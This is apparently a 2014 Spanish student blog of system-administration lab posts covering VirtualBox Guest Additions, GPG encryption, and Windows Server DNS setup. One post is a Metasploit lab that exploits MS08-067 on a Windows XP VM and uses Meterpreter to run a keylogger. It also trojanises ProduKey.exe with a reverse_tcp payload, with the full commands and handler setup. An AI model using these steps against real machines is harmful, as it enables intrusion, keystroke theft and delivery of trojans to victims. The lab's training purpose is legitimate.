miércoles, 12 de noviembre de 2014

Instalar Guest Addittions y carpeta compartida en un Debian en VirtualBox


1. Inicie sesión como root .
2. Actualice su base de datos de APT con apt-get update .
3. Instale las últimas actualizaciones de seguridad con apt-get upgrade .
4. Instalar los paquetes necesarios con apt-get install build-essential module-assistant.
5. Configure su sistema para la construcción de los módulos del kernel ejecutando m-a prepare.
6. Haga clic en Instalar Guest Additions ... en el menú Dispositivos, a continuación, ejecute mount /media/cdrom .
7. Ejecutar sh /media/cdrom/VBoxLinuxAdditions.run, y siga las instrucciones en la pantalla.


En el menú de VirtualBox vamos a DispositivosCarpetas compartidas. Usando el pequeño icono de una carpeta con un símbolo [+] creamos la carpeta compartida. Marcamos las casillas Automontar y permanente. Y nos fijamos del nombre de la carpeta, ya que lo necesitaremos después. Supongamos que el nombre de esa carpeta es VB.

Aceptamos lo que haya que aceptar y volvemos a la máquina virtualizada. Abrimos una terminal para introducir comandos. Hacemos una carpeta donde montará la carpeta compartida. Puede ser algo como:

# mkdir /media/sf_VB
# mount -t vboxsf VB /media/sf_VB

Damos permiso al usuario de virtualbox

adduser usuario vboxsf

Una vez hecho esto podremos acceder al directorio y sus contenidos de forma transparente.

Meterpreter

Lo hacemos con una máquina Kali, que la ponemos en adaptador puente, y cogemos otra máquina, en este caso un Windows XP el cual ponemos también en adaptador puente para que se encuentren ambas máquinas en la misma red, ya que si no, el ejercicio no podría realizarse.
Vamos a ver un ejemplo con ms08_067_netatapi

Entramos con msfconsole


Seleccionamos el exploit: use exploit/windows/smb/ms08_067_netatapi
Seleccionamos el PAYLOAD: set PAYLOAD windows/shell/reverse_tcp


Vemos las opciones que tenemos que configurar: show options


Configuramos las distintas opciones:
set RHOST 192.168.1.110
set LHOST 192.168.1.35


Lanzamos el exploit: exploit


Nos devuelve la shell del equipo de la víctima.
Otros PAYLOADS:
Para conectarse por VNC: windows/vncinject/reverse_tcp


Si lanzamos el exploit lo que se ve es la pantalla de la víctima.


Para salir, se hace pulsando control más C.
Meterpreter : windows/meterpreter/reverse_tcp


Si lanzamos el exploit.


Un ejemplo es el uso del capturador de pantalla.


Si queremos ver los procesos activos para cambiar de proceso lo hacemos con un ps.


Voy a cambiar al proceso del worpad para insertar un keylogger con el cual se capturan las entradas del teclado.

Para ello escribo en el worpad de la víctima.


Vemos que proceso es.


Y nos migramos a ese proceso.


Arrancamos el keylogger.


Para volcar los datos usamos dump.


Y se ve lo que se ha escrito en el documento.
Y para detenerlo se hace con keycan_stop.
Vamos ahora a crear un troyano
Se creará un Troyado utilizando Metasploit Framework, el cual permitirá incrustar un “Payload” o Carga útil dentro de la utilidad ProduKey de NirSoft, el cual muestra el ProductID de Windows, Microsoft Office, Exchange Server, y SQL Server instalado en la computadora donde se ejecuta.
Se procede a descargar y descomprimir el archivo ProducKey desde el sitio web de NirSoft.



Se utiliza la herramienta msfpayload incluida en Metasploit Framework para inyectar un Payload o Carga útil dentro del ejecutable ProduKey.exe.
En el comando msfpayload la opción LHOST define la dirección IP local, mientras que LPORT define el puerto local. Es decir la dirección IP y Puerto hacia el cual la victima realizará la conexión. Para el comando msfencode, la opción “-e” define el codificador a utilizar, la opción “-c” define el número de veces en que se codificarán los datos, la opción “-t” define el formato de salida, la opción “-x” especifica una plantilla ejecutable alterna, y la opción “-o” define el archivo de salida.
# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.35 LPORT=443 R | msfencode -e x86/shikata_ga_nai -c 1 -t exe -x ./ProduKey.exe -o /tmp/ProduKey.exe


El proceso se ha realizado correctamente y se ha generado un nuevo archivo con el mismo nombre, pero que incluye el "Payload" incrustado. Al realizar un listado de archivos, anotar el tamaño de cada uno de los archivos, tanto el archivo original como troyanizado "parecen" ser iguales.


Para identificar de manera sencilla la diferencia entre estos dos archivos se genera el hash SHA-1 de cada uno de ellos.
# sha1sum /tmp/ProduKey.exe ProduKey.exe


El archivo troyanizado debe ser enviado a la víctima utilizando cualquier mecanismo conocido.



Dado que se ha definido un Payload Reverso de Meterpreter, se requiere configurar un manejador para la conexión originada desde la victima hacia la dirección IP asignada al sistema Kali Linux.
msf> use exploit/multi/handler
msf> set PAYLOAD windows/meterpreter/reverse_tcp
msf> set LHOST 192.168.0.12
msf> set LPORT 443
msf> run















Practicando con gpg

Vamos a crear las claves con gpg –gen-key lo hacemos en dos máquinas, las que luego se van a pasar un mensaje encriptado y lo van a desencriptar con las claves.





Visualización de claves: gpg –list-keys las públicas y gpg – list-secret-keys las privadas.


Vamos ahora a exportar la clave pública gpg –armor –output debían.pub --export 238B240A.
Si quisiéramos exportar la clave privada sería: gpg –armor –output debían.priv --exportsecret 238B240A.



Vamos ahora a intercambiar claves, utilizando el medio que quieras y luego las importaremos. En mi caso tengo dos máquinas virtuales abiertas e intercambio las claves a través de la carpeta compartida.


Ahora importamos la clave con: gpg –import debian1.pub



Ahora creamos el documento que queremos enviar encriptado para que lo descifre el destinatario y lo enviamos igual que antes a través de la carpeta compartida.


Ahora vamos a cifrarlo para que el destinatario pueda descifrarlo con la clave pública que le hemos pasado, para ello usamos el siguiente comando:
gpg –output documento1.txt.gpg –encrypt –recipient Mireya.mendes.vega.73@gmail.com documento1.txt


Lo abrimos para comprobar que está cifrado.


Ahora lo pasamos a la otra máquina a través de la carpeta compartida y compruebo que sigue cifrado.


Para poderlo ver entonces, el paso final es descifrarlo con: gpg –output documento1.txt –decrypt documento1.txt.gpg


Se me crea un documento que ya sí que puedo leer.







domingo, 9 de noviembre de 2014

encriptado y desencriptado en Linux

Vamos a encriptar un archivo 

Para ello lo primero que hacemos es un ls para ver que archivos tenemos


Creamos un nuevo archivo con el nano llamado hola.txt con contenido.


Vamos a cifrarlo con la orden gpg –c hola.txt y le metemos una contraseña para poder descifrarlo.


Esto, te crea un archivo hola.txt.gpg que si lo abrimos, será ilegible, ya que esta encriptado, y la única manera de poder leerlo es introduciendo la contraseña.


Para poderlo descifrar ponemos el siguiente comando: gpg –d hola.txt.gpg


Te pedirá la contraseña para poder descifrarlo, y una vez que la introduces, te muestra el mensaje.







sábado, 8 de noviembre de 2014

Instalación y configuración del dns en windows server 2008

INSTALACIÓN

El servicio de Nombres de Dominio nos permitirá resolver todas las direcciones IP de nuestra red interna en el dominio "iespoligonosur.org", así pues procederemos en este instante a instalar dicho servicio.
Para llevar a cabo el proceso accederemos a la ventana de Administración del servidor, y una vez en ella nos situaremos sobre el apartado Funciones ubicado en la zona superior izquierda de la misma, para a continuación hacer clic sobre el enlace Agregar funciones ubicado en la zona derecha de dicha ventana.


A continuación se mostrará la siguiente ventana, donde te da información sobre el asistente, se pulsa el botón de Siguiente.


En la siguiente ventana, es donde se detallan las funciones que podrá realizar nuestro equipo, activando en nuestro caso la casilla de Servidor DNS, tras lo cual pulsaremos sobre el botón Siguiente.


En la siguiente ventana se nos informa de las características de la función que estamos a punto de instalar, así como de los requisitos y configuraciones que precisamos para instalar el servicio correspondiente; en dicha ventana pulsaremos directamente sobre el botón Siguiente.


El asistente de instalación del servicio solicitado, nos informa de que está preparado para instalarlo con las configuraciones especificadas, así pues pulsaremos en dicha ventana sobre el botón Instalar para dar comienzo de modo efectivo al proceso de instalación.


El proceso de instalación dará comienzo pues según lo previsto.

Una vez concluido el proceso de instalación del servidor DNS, se nos informa de que dicho proceso se ha efectuado correctamente; cerraremos el asistente de instalación pulsando sobre el botón Cerrar en la ventana de la imagen inferior.


De vuelta a la ventana de Administrador del servidor, podremos comprobar que ha sido instalado el Servidor DNS.


Vamos a definir la red, para ello vamos a inicio, panel de control, centro de redes y recursos compartidos, administrar conexiones de red, y pulsando con el botón derecho propiedades sobre conexión de área local, dentro de Protocolo de internet versión 4, en propiedades, definimos la nueva red.


CONFIGURACIÓN



Nos situamos sobre el servidor para definir las zonas directas y las zonas inversas.
Le damos al más, y situándonos sobre las zonas de búsqueda directa, volvemos a pulsar el más, para que se nos abra la ventana para agregar una zona nueva y pulsamos con el botón derecho del ratón y pulsamos en zona nueva.


Sale un asistente y en el elegimos la zona principal que es la que te viene por defecto, y como este es el dns primario, es la que marcamos.


Definimos el nombre de la zona, que en nuestro caso es miempresa.org


Y se sigue con el asistente, hasta que se finaliza y queda la zona creada.




Ya queda creada la nueva zona.


Nos metemos dentro de ella, pinchándola dos veces, para describir, los registros SOA, NS y HOST que correspondan. El registro SOA lo dejamos como viene, además pinchando sobre él y por defecto ya viene marcado en transferencia de zona que permite las transferencias de zona.


En el registro NS definimos los dos dns. Para ello pulsamos dos veces sobre él. Quitamos el que viene por defecto y agregamos los que correspondan.


Ponemos el nombre de dominio completo y la dirección IP que le corresponde.



Antes de añadir los host, siguiendo el asistente creamos la zona inversa, para que cuando marquemos el puntero herede los host que se le añadan, la forma de hacerlo es igual que antes, siguiendo los pasos del asistente.

Elegimos la zona principal, en la siguiente ventana la zona de búsqueda inversa para IPv4.



Definimos el id de red 10.0.0.



Permitimos actualizaciones dinámicas.


Y finalizamos el asistente ya con la zona creada.


Nos ponemos sobre cualquier parte de la zona derecha en blanco para añadir los host.


Y vamos añadiendo los host uno a uno y poniendo la dirección que les corresponde. Y marcando el registro del puntero, para que cuando creemos las zonas inversas se trasladen directamente sin tenerlas que meter manualmente.



Y cuando se haya acabado de introducir host se le da a realizado.



Ahora añadimos al igual que hemos hecho con esta zona las siguientes, se las puede definir como subdominios de esta zona de esa forma lo único que hay que ir añadiendo son los host correspondientes y para ello nos vamos sobre la zona de miempresa.org y pinchamos sobre dominio nuevo.



Y entrando en él lo que hacemos es crear los host que correspondan y como es un subdominio de miempresa.org, hereda tanto el registro SOA como los NS.





Al igual que antes definimos los servidores de nombre en las zonas inversas, los host directamente los ha heredado, no ha sido necesario meterlos.



Y lo mismo con las otras zonas inversas.


Ahora comprobamos que el dns funciona correctamente. Para ello nos vamos a la consola y con nslookup, vamos probando direcciones.



CONFIGURACIÓN DE UN DNS SECUNDARIO


Vamos ahora a habilitar un dns secundario, para ello, abrimos otro server y le configuramos la red, para que ambos se encuentren en la misma red, y para que no nos de problemas deshabilitamos los firewall en ambas máquinas.
Lo más rápido es clonar la máquina que ya tenemos creada pero no nos podemos olvidar de reiniciar la dirección MAC de todas las tarjetas de red, para que no nos de problemas.



Lo que hacemos ahora es seguir el asistente como hicimos antes y lo que elegimos en esta ocasión es la zona secundaria, en cada zona que creemos, de la misma forma a como lo hemos hecho en el dns primario.


Ponemos el nombre de la zona.


Ponemos la dirección ip del dns primario y finalizamos.



Al actualizar, vuelca todos los datos del dns primario.


Con las zonas inversas lo hacemos igual que antes y al actualizar después de crearlas vuelca los datos del dns primario.




Ahora nos vamos a la terminal para comprobar a través del nslookup que todo funciona  a la perfección.



Cambiamos el archivo SOA en el dns primario según las indicaciones del ejercicio


Y se comprueba en el dns secundario que una vez actualizado se refleja el cambio.